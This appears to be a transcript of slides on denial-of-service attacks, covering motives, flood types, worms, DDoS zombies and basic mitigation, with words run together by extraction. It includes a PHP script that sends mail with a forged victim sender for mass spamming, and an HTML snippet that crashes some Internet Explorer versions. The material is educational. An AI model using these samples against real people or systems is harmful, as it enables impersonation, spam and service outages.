Post on 18-May-2015
transcript
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
DOSTypesSimulationInternet WormDDOSDiscussion
Details
http://google.com/search?q=y3dips
A denial-of-service attack is an attack on a computer system or network that causes a loss of service to users
DOS
http://google.com/search?q=y3dips
MotivesMoneyRevengePrestigeGaining AccessPolitic
http://google.com/search?q=y3dips
DOS HistoryClassical DOS Internet WormsDdos
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
Classical DOSApplication BugConsumption of computational resourcesDisabling web trafficMail bombing
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
TCP syn floodICMP/UDP/ECHO (ping) to broadcast addresses ( SMURF)Out of Band (oob) Attack (winnuke:139) ARP poisoningPing of Death (win95)Port flooding Mail bombing
Some Examples/Types
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
Mass Spamming?A Real Life ExampleUsing SMTPEasy Proof Of concept
Reply to : victim@dudul.com
Sender : anonymous@fvck.com
To : xxx@multiple server
Received : victim@dudul.com
Mail Server A
Mail Server B
Mail Server C
http://google.com/search?q=y3dips
<?
$recipient = “xxx@multiple mailserver";
$subject = “fake";
$mailheaders = "From: victim@dudul.com \n";
$mailheaders .= "Reply-To: victim@dudul.com\n";
$msg= "\nIts a spam\n";
mail($recipient, $subject, $msg, $mailheaders) or die (“tidak terkirim!");
?>
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
ApplicationServicesSystem
CPUMemoryRamNetworking
DDOS against
http://google.com/search?q=y3dips
DDos Against IEInternet Explorer is Microsoft Windows Web browserSome Version has hole in XML scriptError in Application
<!-- Discovered byInge Henriksen (inge.henriksen@booleansoft.com) http://ingehenriksen.blogspot.com/--><table>
<tr><td><IMG align=left>X X X<?xml:namespace prefix=v>
<v:X style="HEIGHT:1"></td></tr>
</table>
http://google.com/search?q=y3dips
Apache is a free web server Some Version vulnerable to this kind of DosServer temporary down
DDos Against Apache
http://google.com/search?q=y3dips
Limited ResourcesMultiple ProcessSome Infinite loop wouls suck more resources
DDos Against cpu, memory, ram
http://google.com/search?q=y3dips
Flooding the networkCut all trafficFill the bandwidth
DDos Against Network
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
WormA computer program which replicates itself and is self-propagating. Worms, as opposed to viruses, are meant to spawn in network environments.
http://google.com/search?q=y3dips
WormActive propagated itself Combine With sytem/application hole Ddos Agent/zombie
web traffic flooding
Mass war machine
Resources Take Over
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
Distributed AttackMultiple ImpactZombie/Agent
D dos
http://google.com/search?q=y3dips
Any types of Dos ttack
Single user Target
Attacker
zombie
zombie
zombie
zombiezombie
zombie
Target
Ahmad Muammar W. K.http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
Survive (mitigate Ddos)Network ConfigurationChange IP AddressStrong peripheral
Filtering Technique (signatures of the traffic)Some Mirror/Backup
Ahmad Muammar W. K.http://google.com/search?q=y3dips